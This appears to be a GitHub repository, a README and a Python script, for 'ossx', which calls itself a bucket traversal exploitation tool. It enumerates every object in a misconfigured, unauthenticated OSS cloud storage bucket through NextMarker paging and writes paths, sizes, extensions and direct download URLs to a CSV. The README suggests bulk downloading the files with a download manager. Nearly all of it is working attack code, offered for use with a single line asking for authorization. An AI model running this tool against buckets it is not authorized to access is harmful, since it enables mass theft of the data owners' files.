├── README.md
└── ossx.py


/README.md:
--------------------------------------------------------------------------------
# ossx
Bucket traversal (object listing) vulnerability exploitation script

Extracts the file paths, sizes, and extensions of an unauthenticated OSS bucket in bulk.

Paging through the unauthenticated bucket is driven by the NextMarker parameter, while the max-keys parameter controls how many results are returned per page; a short sketch of this loop is shown below.

The extracted results are written to a CSV file automatically, so they can later be filtered by file extension or file size.

The file URLs can also be imported in bulk into a download manager such as Xunlei (Thunder) for batch downloading.

![image](https://github.com/source-xu/oss-x/assets/56073532/592ff801-d27a-4fba-b664-91537c8312c4)

![image](https://github.com/source-xu/ossx/assets/56073532/a3f318fe-456d-42a8-af56-66e7df7bc9a6)


![image](https://github.com/source-xu/oss-x/assets/56073532/54dffeb3-5590-44da-9834-de261d912bb3)
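
The snippet below is a minimal sketch (not part of ossx.py) of the paging mechanism the script automates: request a page with `max-keys` and `marker`, read `NextMarker` from the XML listing, and repeat until it disappears. The bucket URL is a placeholder, and namespaced XML responses (which ossx.py does handle) are left out for brevity.

```python
import requests
import xml.etree.ElementTree as ET

# Hypothetical bucket URL -- only point this at a bucket you are authorized to test.
BUCKET_URL = "https://example-bucket.oss-cn-hangzhou.aliyuncs.com/"

marker = ""
while True:
    # Each page is requested with max-keys (page size) and marker (where to resume).
    resp = requests.get(BUCKET_URL, params={"max-keys": 1000, "marker": marker}, timeout=10)
    root = ET.fromstring(resp.content)
    # Real listings may wrap these tags in an XML namespace; that case is omitted here.
    for contents in root.findall(".//Contents"):
        print(contents.findtext("Key"), contents.findtext("Size"))
    # NextMarker is the key to resume from; when it is absent, the listing is complete.
    marker = root.findtext(".//NextMarker")
    if not marker:
        break
```

ossx.py wraps this same loop with namespace handling, duplicate detection, and CSV output.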
--------------------------------------------------------------------------------


/ossx.py:
--------------------------------------------------------------------------------
import csv
import time
import warnings
import xml.etree.ElementTree as ET

import requests
import urllib3

# Suppress InsecureRequestWarning (all requests are made with verify=False)
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

# Accumulates every key seen so far, across all pages
total_keys = []


# Fetch the bucket's default page size (MaxKeys, capped at 1000 by the service) and the
# NextMarker, and create the CSV file with its header row.
def get_info(url):
    response = requests.get(url, verify=False)
    # Parse the XML listing
    xml_content = response.content
    root = ET.fromstring(xml_content)
    maxkey = root.findtext(".//MaxKeys")
    nextmarker = root.find(".//NextMarker")
    xpath_expr = ".//Contents"
    # If the root tag carries a namespace, the XPath expressions must include it
    has_namespace = root.tag.startswith("{")
    if has_namespace:
        # Extract the namespace URI
        namespace = root.tag.split('}')[0].strip('{')
        xpath_expr = f".//{{{namespace}}}Contents"
        maxkey = root.findtext(f".//{{{namespace}}}MaxKeys")
        nextmarker = root.find(f".//{{{namespace}}}NextMarker")
    # Collect the names of all child tags found under <Contents>
    child_tags = set()
    for contents_element in root.findall(xpath_expr):
        for child_element in contents_element:
            if has_namespace:
                child_tags.add(child_element.tag.replace(f"{{{namespace}}}", ""))
            else:
                child_tags.add(child_element.tag)
    # Create the CSV file and write its header row (the column names)
    filename = write_csv_header(child_tags)
    # Return the page size, next-page marker, CSV filename, and set of column names
    return maxkey, nextmarker, filename, child_tags


def getdata(baseurl, max_keys, csv_filename, child_tags, marker='', page=0):
    if int(max_keys) < 1000:
        max_keys = 1000
    url = baseurl + f'?max-keys={max_keys}&marker={marker}'
    response = requests.get(url, verify=False)
    xml_content = response.content
    root = ET.fromstring(xml_content)
    # Check whether the root tag carries a namespace
    namespace = ''
    xpath_expr = ".//Contents"
    nextmarker = root.findtext(".//NextMarker")
    has_namespace = root.tag.startswith("{")
    if has_namespace:
        # Extract the namespace URI
        namespace = root.tag.split('}')[0].strip('{')
        xpath_expr = f".//{{{namespace}}}Contents"
        nextmarker = root.findtext(f".//{{{namespace}}}NextMarker")
    datas = root.findall(xpath_expr)
    # Write this page's rows to the CSV file
    nums, is_repeat, repeat_nums, total_nums = write_csv_content(csv_filename, datas, has_namespace, namespace,
                                                                 child_tags)
    page += 1
    print(f"[+] Page {page}: {nums} new entries, {total_nums} files found in total")
    # If NextMarker is present there is another page to fetch; otherwise the listing is complete
    if nextmarker is None or is_repeat == 1:
        print(f"[√] Results written to {csv_filename}, go take a look 😀")
        return
    # Recurse for the next page, resuming from NextMarker
    getdata(baseurl, max_keys, csv_filename, child_tags, nextmarker, page)


def write_csv_header(child_tags):
    # Use the current timestamp to build a unique CSV filename
    timestamp = int(time.time())
    timestamp_str = str(timestamp)
    # Create the CSV file and write the header row
    csv_filename = f'xml_data{timestamp_str}.csv'
    with open(csv_filename, 'w', newline='') as csv_file:
        # Besides the XML columns, add a full "url" column and a "filetype" column
        writer = csv.writer(csv_file)
        list_tags = list(child_tags)
        list_tags.append("url")
        list_tags.append("filetype")
        writer.writerow(list_tags)
    return csv_filename


def write_csv_content(csv_filename, datas, has_namespace, namespace, child_tags):
    # Extract the data and append it to the CSV file
    with open(csv_filename, 'a', newline='') as csv_file:
        nums = 0
        repeat_nums = 0
        is_repeat = 0
        writer = csv.writer(csv_file)
        # Write one row per <Contents> element
        for contents_element in datas:
            if has_namespace:
                row = [contents_element.findtext(f"{{{namespace}}}{tag}") for tag in child_tags]
                key = contents_element.findtext(f"{{{namespace}}}Key")
            else:
                row = [contents_element.findtext(tag) for tag in child_tags]
                key = contents_element.findtext("Key")
            if str(key) not in total_keys:
                nums += 1
                total_keys.append(key)
                # baseUrl is set in the __main__ block
                url = str(baseUrl) + str(key)
                parts = str(key).split(".")
                if len(parts) > 1:
                    # The key contains a dot, so treat the last part as the file extension
                    file_extension = parts[-1]
                else:
                    # Otherwise the key has no file extension
                    file_extension = ""
                row.append(url)
                row.append(file_extension)
                writer.writerow(row)
            else:
                # The key was already seen on a previous page
                repeat_nums += 1
                if repeat_nums > 2:
                    is_repeat = 1

    return nums, is_repeat, repeat_nums, len(total_keys)


if __name__ == '__main__':
    # Read the target URLs from the user
    url = input("[*] Enter the bucket listing URL: ").strip()
    baseUrl = input("[*] Enter the bucket root URL (leave empty to reuse the URL above): ").strip()
    if baseUrl == '':
        baseUrl = url
    if not baseUrl.endswith('/'):
        baseUrl += '/'
    # Fetch the bucket's basic info (default page size, next-page marker) and create the CSV file with its header
    try:
        maxkey, nextmarker, csv_filename, child_tags = get_info(url)
        if len(child_tags) != 0:
            print("[+] XML data extracted successfully! ✨")
            # Default to 1000 when MaxKeys is not specified
            if maxkey is None:
                maxkey = 1000
            print(f"[o] This bucket shows {maxkey} entries per page by default")
            if nextmarker is None:
                print("[-] This bucket does not support web paging traversal 😢")
            else:
                print("[+] This bucket supports traversal, fetching files and counts 😀")
                getdata(url, max_keys=maxkey, child_tags=child_tags, csv_filename=csv_filename)
        else:
            print("[-] This bucket cannot be traversed, or check whether the URL is correct!")
    except Exception as e:
        print(e)
        print("[-] XML parsing failed, traversal is not possible 😢")
--------------------------------------------------------------------------------